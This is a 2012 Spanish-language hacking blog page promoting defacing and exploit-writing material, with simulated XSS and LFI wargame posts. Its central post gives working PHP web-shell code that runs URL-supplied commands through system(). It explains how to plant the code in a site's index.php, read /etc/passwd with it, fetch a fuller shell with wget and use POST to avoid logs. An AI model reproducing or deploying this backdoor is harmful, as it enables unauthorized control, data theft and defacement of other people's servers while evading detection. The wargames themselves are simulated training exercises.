¡¡Bienvenidos!

¡Bienvenidos a todos espero su estancia sea agradable y encuentren lo que deseen!

¡Curso PHP

Quieres aprender PHP? Aquí tienes la respuesta!

¡Wargames!

¿Te gustan los wargames? Estaré publicando wargames de diferentes áreas de la informática.

¡Creación de Exploits!

Aprende todo lo relacionado sobre como crear tus exploits

¿Te Gustaría aprender a Defacear?

Este es un paper que enseña lo basico para que empieces con el defacing

jueves, 29 de noviembre de 2012

Wargame XSS

Hola amigos.
Tiempo sin programar algún wargame, Bien este consiste en lograr sacar una alerta (El XSS esta simulado).
pero cuando logres el vector correcto te dirá que pasaste la prueba así que... ¡SUERTE!

Link

Publiquen sus fotos aquí en la entrada.
Saludos.

sábado, 24 de noviembre de 2012

Creando un minibackdoor en PHP

Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así:

<form method="GET" action="lol.php">
<input type="text" name="comando">
<input type="submit" value="ejecutar">
<?php
if(isset($_GET['comando']));
{
$lol = @system($_GET['comando']);


echo $lol;
}
?>

En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:


Explicaré un poco la función por la que nuestro Mini Backdoor trabaja:
System: Es una función que permite ejecutar comandos dentro de un servidor.

En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecuto satisfactoriamente.

Otra cosa que podemos hacer es poner
$lol = @system($_GET['comando']);
en algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria servidor.com/index.php?comando=cat+%2Fetc%2Fpasswd

y ejecutaria lo que es el comando.

Espero que les haya gustado.
Un saludo.

domingo, 11 de noviembre de 2012

Wargame: Consigue el etc/passwd con LFI

Hola amigos.
hace mucho no creo un wargame y pues bueno les dejo este:
Consiste en poner en el formulario de texto los directorios a subir para logar sacar el LFI (Es una simulacion)
Cuando saquen el LFI les satara una alerta diciendo que has pasado el wargame)
Debes tomar foto a esa alerta y publicarla en esta entrada ó en el post correspondiente de underc0de (Ver post)
Espero les guste.


Link del wargame

Saludos.

martes, 6 de noviembre de 2012

Entrevista a Moften.


Estamos con @Moften. Programador, Developer, Pentester, auditor, Entre otras muchas cosas.
Nos hablara sobre sus mas grandes experiencias y proyectos.